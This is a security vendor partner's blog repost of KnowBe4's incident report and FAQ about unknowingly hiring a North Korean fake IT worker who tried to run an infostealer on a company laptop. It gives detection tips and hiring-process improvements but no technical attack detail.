<img src="https://secure.leadforensics.com/86554.png" alt="" style="display:none;">

KnowBe4 Stops Insider Threat

Written on: Jul 29, 2024 3:28:43 PM

Written by: Dylan Swain

Topic

[COOLSPIRiT, KnowBe4]

One of our partners, KnowBe4, recently stopped an attempted attack from a North Korean IT hacker. Their experience will give your organisation valuable insight into these attacks and help to understand what they are before they can become an issue for your organisation.

 

Incident Report Summary: Insider Threat

First of all: No illegal access was gained, and no data was lost, compromised, or exfiltrated on any KnowBe4 systems. This is not a data breach notification, there was none. See it as an organizational learning moment I am sharing with you. If it can happen to us, it can happen to almost anyone. Don't let it happen to you.  Story updated 7/27/2024.

TLDR: KnowBe4 needed a software engineer for our internal IT AI team. We posted the job, received resumes, conducted interviews, performed background checks, verified references, and hired the person. We sent them their Mac workstation, and the moment it was received, it immediately started to load malware.

Our HR team conducted four video conference based interviews on separate occasions, confirming the individual matched the photo provided on their application. Additionally, a background check and all other standard pre-hiring checks were performed and came back clear due to the stolen identity being used. This was a real person using a valid but stolen US-based identity. The picture was AI "enhanced". 

The EDR software detected it and alerted our InfoSec Security Operations  Center. The SOC called the new hire and asked if they could help. That's when it got dodgy fast. We shared the collected data with our friends at Mandiant, a leading global cybersecurity expert, and the FBI, to corroborate our initial findings. It turns out this was a fake IT worker from North Korea. The picture you see is an AI fake that started out with stock photography (below). The detail in the following summary is limited because this is an active FBI investigation. 

SUMMARY: This report covers the investigation of Employee ID: XXXX hired as a Principal Software Engineer. On July 15, 2024, a series of suspicious activities were detected on that user account. Based on the SOC teams evaluation of the activities it was found this may have been intentional by the user and suspected he may be an Insider Threat/Nation State Actor. Upon initial investigation and containment of host, a more detailed inquiry into the new hire took place.

On July 15, 2024, a series of suspicious activities were detected on the user beginning at 9:55pm EST. When these alerts came in KnowBe4’s SOC team reached out to the user to inquire about the anomalous activity and possible cause. XXXX responded to SOC that he was following steps on his router guide to troubleshoot a speed issue and that it may have caused a compromise.

The attacker performed various actions to manipulate session history files, transfer potentially harmful files, and execute unauthorized software.  He used a raspberry pi to download the malware. SOC attempted to get more details from XXXX including getting him on a call. XXXX stated he was unavailable for a call and later became unresponsive. At around 10:20pm EST SOC contained XXXX's device.

How this works is that the fake worker asks to get their workstation sent to an address that is basically an "IT mule laptop farm". They then VPN in from where they really physically are (North Korea or over the border in China) and work the night shift so that they seem to be working in US daytime. The scam is that they are actually doing the work, getting paid well, and give a large amount to North Korea to fund their illegal programs. I don't have to tell you about the severe risk of this. It's good we have new employees in a highly restricted area when they start, and have no access to production systems. Our controls caught it, but that was sure a learning moment that I am happy to share with everyone. 

TIPS TO PREVENT THIS 

  • Scan your remote devices, to make sure no one remotes into those.
  • Better vetting, making sure that they are physically where they are supposed to be.
  • Better resume scanning for career inconsistencies.
  • Get these people on video camera and ask them about the work they are doing.
  • The laptop's shipping address different from where they are supposed to live/work is a red flag.

RECOMMENDED PROCESS IMPROVEMENT

  • Background check appears inadequate. Names used were not consistent.
  • References potentially not properly vetted. Do not rely on email references only.
  • Implement enhanced monitoring for any continued attempts to access systems.
  • Review and strengthen access controls and authentication processes.
  • Conduct security awareness training for employees, emphasizing social engineering tactics

WHAT TO LOOK OUT FOR:

  • Use of VOIP numbers and lack of digital footprint for provided contact information
  • Discrepancies in address and date of birth across different sources
  • Conflicting personal information (marital status, "family emergencies" explaining unavailability)
  • Sophisticated use of VPNs or VMs for accessing company systems
  • Attempt to execute malware and subsequent cover-up efforts

ALERT HR ABOUT:

The subject has demonstrated a high level of sophistication in creating a believable cover identity, exploiting weaknesses in the hiring and background check processes, and attempting to establish a foothold within the organization's systems.

This is a well-organized, state-sponsored, large criminal ring with extensive resources. The case highlights the critical need for more robust vetting processes, continuous security monitoring, and improved coordination between HR, IT, and security teams in protecting against advanced persistent threats. Left is the original stock picture. Right is the AI fake submitted to HR.

Screenshot 2024-07-29 at 15.33.52

Credit: Stu Sjouwerman | Original Blog

 
Frequently Asked Questions About KnowBe4's Fake IT Worker Blog
 
July 23, 2024, I wrote a blog post about how KnowBe4 inadvertently hired a skillful North Korean IT worker who used the stolen identity of a US citizen. He participated in several rounds of video interviews and circumvented background check processes commonly used. Updated 7/27/2024
 
The intent was to share an organizational learning moment, so you can make sure this does not happen to you. The story went viral, which is exactly what I had hoped for, but the press coverage was uneven. Do we have egg on our face? Yes. And I am sharing that lesson with you. It's why I started KnowBe4 in 2010. In 2024 our mission is more important than ever. 
 
Q1: Was any KnowBe4 system breached in this North Korean IT worker incident?
No. KnowBe4 was not breached. When we hire new employees, their user account is granted only limited permissions that allow them to proceed through our new hire onboarding process and training. They can access only a minimal number of necessary apps to go through our new employee training.
 
Q2: What access do new employees get? 
These are apps such as their email inbox, slack, and zoom. The workstation they receive is locked down and has no data residing on it, it is essentially a laptop with nothing on it except our endpoint security and management tools
 
Q3: Did the new employee get access to customer data? 
No. This person never had access to any customer data, KnowBe4's private networks, cloud infrastructure, code, or any KnowBe4 confidential information. They had basic communication apps and a factory-new provisioned laptop. We detected suspicious activity and responded within minutes, quarantining the entire laptop. 
 
Q4: Was any malware executed on the machine? 
No. No malware was executed on the machine as it was blocked by our security tooling. A complete review of all processes, commands, network connections, and other activity on the laptop was conducted and we concluded that no further action was needed as there was no suspicious activity outside of what was detected and blocked.
 
Q5: What access did this worker have on his workstation that could have compromised customer data or perhaps used the simulated phishing platform?
There was nothing provided on the laptop. All of KnowBe4 data is kept in the cloud and a review of this individual's user account determined they did not access anything other than their own email inbox. We provision access to our KnowBe4 platform through Okta. New hires are not granted access into the KnowBe4 platform until after completion of their onboarding, which this person had not completed, and therefore never had access to the platform.
 
Q6: Why would someone hired as a software developer try to load malware on their new machine? 
We can only guess, but the malware was an infostealer targeting data stored on web browsers, and perhaps he was hoping to extract information left on the computer before it was commissioned to him.
 
Q7: How did this bad actor pass your hiring process?
This was a skillful North Korean IT worker, supported by a state-backed criminal infrastructure, using the stolen identity of a US citizen participating in several rounds of video interviews and circumvented background check processes commonly used by companies.
 
Q8: The press made it sound like a data breach disclosure. Was it? 
No. It was a Public Service Announcement. We could have kept quiet while wiping the egg off our face. However, our mission is to make the world aware of cybercrime. If something like this can happen to us, it can happen to almost anyone. The blog post was meant to warn organizations about this particular danger. It looks like we have succeeded.
 
Q9: Has KnowBe4 changed their hiring process? 
You bet we have! Several process changes were made so that this thing will be caught earlier. One example is that in the US we will only ship new employee workstations to a nearby UPS shop and require a picture ID.
 
Q10: How can I learn more about this particular risk? 
On the blog post at the end, we link to a podcast from Mandiant where they go in depth about this particular danger. I strongly recommend you listen to it. The U.S. Government is aware of this threat and has been warning against it since 2022. Here is the link!
 
Q11: How has the press been covering this? 
Uneven. Many technical media outlets have been cool, calm and collected, consider this a great cautionary tale, and appreciated us being transparent. Other outlets took the "If it bleeds, it leads" sensational angle. They turned it into "data breach" clickbait and only casually mentioned at the end that no harm was done.

 

Credit: Stu Sjouwerman | Original Blog

Discover our latest insights

Enhance your knowledge by browsing our extensive library of case studies, brief sheets, data sheets, ebooks and white papers. If you have any immediate queries or requests, why not reach out to our team?